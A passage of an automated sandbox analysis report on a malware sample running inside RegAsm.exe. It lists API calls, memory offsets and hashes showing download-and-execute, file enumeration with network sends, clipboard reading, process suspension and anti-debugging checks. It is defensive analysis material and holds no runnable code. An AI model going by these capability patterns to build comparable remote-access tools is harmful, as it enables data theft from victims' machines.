                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: DownloadExecuteFileShell
                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                      • API String ID: 2825088817-3056885514
                      • Opcode ID: 57e66fe2e87bdf359e054cb859feee537a058da987d294243e55d6d911c175b2
                      • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                      • Opcode Fuzzy Hash: 57e66fe2e87bdf359e054cb859feee537a058da987d294243e55d6d911c175b2
                      • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                      APIs
                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                      • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileFind$FirstNextsend
                      • String ID: XPG$XPG
                      • API String ID: 4113138495-1962359302
                      • Opcode ID: 7c65e5dbbeab715d6c265566595d3c5211208f6f7f3119023cba82770af27956
                      • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                      • Opcode Fuzzy Hash: 7c65e5dbbeab715d6c265566595d3c5211208f6f7f3119023cba82770af27956
                      • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                      APIs
                      • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                        • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                        • Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137A6
                        • Part of subcall function 0041376F: RegCloseKey.KERNEL32(?,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137B1
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseCreateInfoParametersSystemValue
                      • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                      • API String ID: 4127273184-3576401099
                      • Opcode ID: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                      • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                      • Opcode Fuzzy Hash: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                      • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID: 6/
                      • API String ID: 3906539128-4212659297
                      • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                      • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                      • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                      • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                      APIs
                        • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                      • IsValidCodePage.KERNEL32(00000000), ref: 00451DBA
                      • _wcschr.LIBVCRUNTIME ref: 00451E4A
                      • _wcschr.LIBVCRUNTIME ref: 00451E58
                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00451EFB
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                      • String ID:
                      • API String ID: 4212172061-0
                      • Opcode ID: d51387d99b1e6b249aff8f61d3989bee7608b3a62aead1fc41d833bb042b57a0
                      • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                      • Opcode Fuzzy Hash: d51387d99b1e6b249aff8f61d3989bee7608b3a62aead1fc41d833bb042b57a0
                      • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                      APIs
                      • _free.LIBCMT ref: 004493BD
                        • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                        • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                      • GetTimeZoneInformation.KERNEL32 ref: 004493CF
                      • WideCharToMultiByte.KERNEL32(00000000,?,00472764,000000FF,?,0000003F,?,?), ref: 00449447
                      • WideCharToMultiByte.KERNEL32(00000000,?,004727B8,000000FF,?,0000003F,?,?,?,00472764,000000FF,?,0000003F,?,?), ref: 00449474
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                      • String ID:
                      • API String ID: 806657224-0
                      • Opcode ID: 633092c3bba77b0065560d4fdbd9d9f897920caf7f9bf618c5d01735725c6ecb
                      • Instruction ID: 1863d2ad967fb4723a60e4ea427cb143a9fbff6035582c54e6546b9b7662ab80
                      • Opcode Fuzzy Hash: 633092c3bba77b0065560d4fdbd9d9f897920caf7f9bf618c5d01735725c6ecb
                      • Instruction Fuzzy Hash: E1312570908201EFDB18DF69DE8086EBBB8FF0572071442AFE054973A1D3748D42DB18
                      APIs
                        • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                        • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorInfoLastLocale$_free$_abort
                      • String ID:
                      • API String ID: 2829624132-0
                      • Opcode ID: efce462eab54bf8eb2a2b6f9a4d43eb8e53eecd25de09d2246b00390d92e3d5e
                      • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                      • Opcode Fuzzy Hash: efce462eab54bf8eb2a2b6f9a4d43eb8e53eecd25de09d2246b00390d92e3d5e
                      • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                      APIs
                      • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                      • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                      • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                      • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                      APIs
                      • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
                      • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
                      • ExitProcess.KERNEL32 ref: 004432EF
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$CurrentExitTerminate
                      • String ID:
                      • API String ID: 1703294689-0
                      • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                      • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                      • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                      • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                      APIs
                      • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                      • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                      • ExitProcess.KERNEL32 ref: 10004AEE
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: Process$CurrentExitTerminate
                      • String ID:
                      • API String ID: 1703294689-0
                      • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                      • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                      • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                      • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                      APIs
                      • OpenClipboard.USER32(00000000), ref: 0040B711
                      • GetClipboardData.USER32(0000000D), ref: 0040B71D
                      • CloseClipboard.USER32 ref: 0040B725
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Clipboard$CloseDataOpen
                      • String ID:
                      • API String ID: 2058664381-0
                      • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                      • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                      • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                      • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                      APIs
                      • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00415FFF,00000000), ref: 0041BB14
                      • NtSuspendProcess.NTDLL(00000000), ref: 0041BB21
                      • CloseHandle.KERNEL32(00000000,?,?,00415FFF,00000000), ref: 0041BB2A
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$CloseHandleOpenSuspend
                      • String ID:
                      • API String ID: 1999457699-0
                      • Opcode ID: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
                      • Instruction ID: bc08a5c74f7a636e8823ed9fed2a710289fdff4cb0149baf3e3f1c1580a6a9c0
                      • Opcode Fuzzy Hash: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
                      • Instruction Fuzzy Hash: 96D05E36204231E3C32017AA7C0CE97AD68EFC5AA2705412AF804C26649B20CC01C6E8
                      APIs
                      • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00416024,00000000), ref: 0041BB40
                      • NtResumeProcess.NTDLL(00000000), ref: 0041BB4D
                      • CloseHandle.KERNEL32(00000000,?,?,00416024,00000000), ref: 0041BB56
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$CloseHandleOpenResume
                      • String ID:
                      • API String ID: 3614150671-0
                      • Opcode ID: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
                      • Instruction ID: 907c56f48a3137ad3e5a70bb4b43f8813844e3fa30c0a1486a2e097c633c30d6
                      • Opcode Fuzzy Hash: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
                      • Instruction Fuzzy Hash: B8D05E36104121E3C220176A7C0CD97AE69EBC5AA2705412AF904C32619B20CC01C6F4
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: FeaturePresentProcessor
                      • String ID: MZ@
                      • API String ID: 2325560087-2978689999
                      • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                      • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                      • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                      • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                      APIs
                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoLocale
                      • String ID: GetLocaleInfoEx
                      • API String ID: 2299586839-2904428671
                      • Opcode ID: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                      • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                      • Opcode Fuzzy Hash: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                      • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                      • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                      • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                      • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00453326,?,?,00000008,?,?,004561DD,00000000), ref: 00453558
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      • Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                      • Instruction ID: ef9cfcefdd20db456822e604066c987cb5d00f1002a97bdaec88d2537339d9b1
                      • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                      • Instruction Fuzzy Hash: 40B16C311106089FD715CF28C48AB657BE0FF053A6F258659EC9ACF3A2C739DA96CB44
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000B5BC,?,?,00000008,?,?,1000B25C,00000000), ref: 1000B7EE
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      • Opcode ID: 5385f7ee1153a66eb2669645b58237e3e0719d9079e030963b5c19e75e4dc3f3
                      • Instruction ID: c899a2dc376e060411cab8954cdd4c29929d9ba6cfa71f030d59b99a2ca162da
                      • Opcode Fuzzy Hash: 5385f7ee1153a66eb2669645b58237e3e0719d9079e030963b5c19e75e4dc3f3
                      • Instruction Fuzzy Hash: 0DB16B31610A09CFE755CF28C486B647BE0FF453A4F25C658E89ACF2A5C735E982CB40
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 1f1efbfc6b98b7ff63776831a751ef1758ce1d1abb45475947e68a2c5420a09b
                      • Instruction ID: aa2317f629b7fe23c078ec1ce6c5eb8ae6c7f7e5ba67e2b2e47e92e01b9ebfde
                      • Opcode Fuzzy Hash: 1f1efbfc6b98b7ff63776831a751ef1758ce1d1abb45475947e68a2c5420a09b
                      • Instruction Fuzzy Hash: A4126F32B083008BD714EF6AD851A1FB3E2BFCC758F15892EF585A7391DA34E9058B46
                      APIs
                        • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                        • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast$_free$InfoLocale_abort
                      • String ID:
                      • API String ID: 1663032902-0
                      • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                      • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                      • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                      • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                      APIs
                        • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                      • EnumSystemLocalesW.KERNEL32(004520C3,00000001), ref: 0045200D
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                      • String ID:
                      • API String ID: 1084509184-0
                      • Opcode ID: 92dc4731b164c5dad593997b290ced1c322b4c5a654dbafbc59ecf52729822b9
                      • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                      • Opcode Fuzzy Hash: 92dc4731b164c5dad593997b290ced1c322b4c5a654dbafbc59ecf52729822b9
                      • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                      APIs
                        • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
